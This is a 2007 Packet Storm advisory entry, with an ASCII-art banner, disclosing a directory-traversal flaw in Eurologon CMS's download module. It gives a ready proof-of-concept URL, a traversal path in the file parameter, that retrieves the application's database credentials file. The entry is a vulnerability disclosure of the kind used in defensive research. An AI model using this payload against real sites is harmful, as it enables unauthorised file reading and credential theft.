eurologon-disclose.txt

2007-11-28T00:00:00
ID PACKETSTORM:61303
Type packetstorm
Reporter KiNgOfThEwOrLd
Modified 2007-11-28T00:00:00

Description

                                        
                                            `---------------------------------------------------------------  
____ __________ __ ____ __   
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_   
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\  
| | | \ | |/ \ \___| | /_____/ | || |   
|___|___| /\__| /______ /\___ >__| |___||__|   
\/\______| \/ \/   
---------------------------------------------------------------  
  
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org   
  
---------------------------------------------------------------  
  
Eurologon CMS Db credentials disclosure / files download  
  
---------------------------------------------------------------  
  
#By KiNgOfThEwOrLd  
  
---------------------------------------------------------------  
PoC  
  
The download module, not correctly check the file parameter, then using directory traversal we can get all the files hosted in our target web space.  
---------------------------------------------------------------  
Get Database Credentials  
  
http://[target]/users/files.php?mode=download&file=../../application.php  
---------------------------------------------------------------  
  
  
`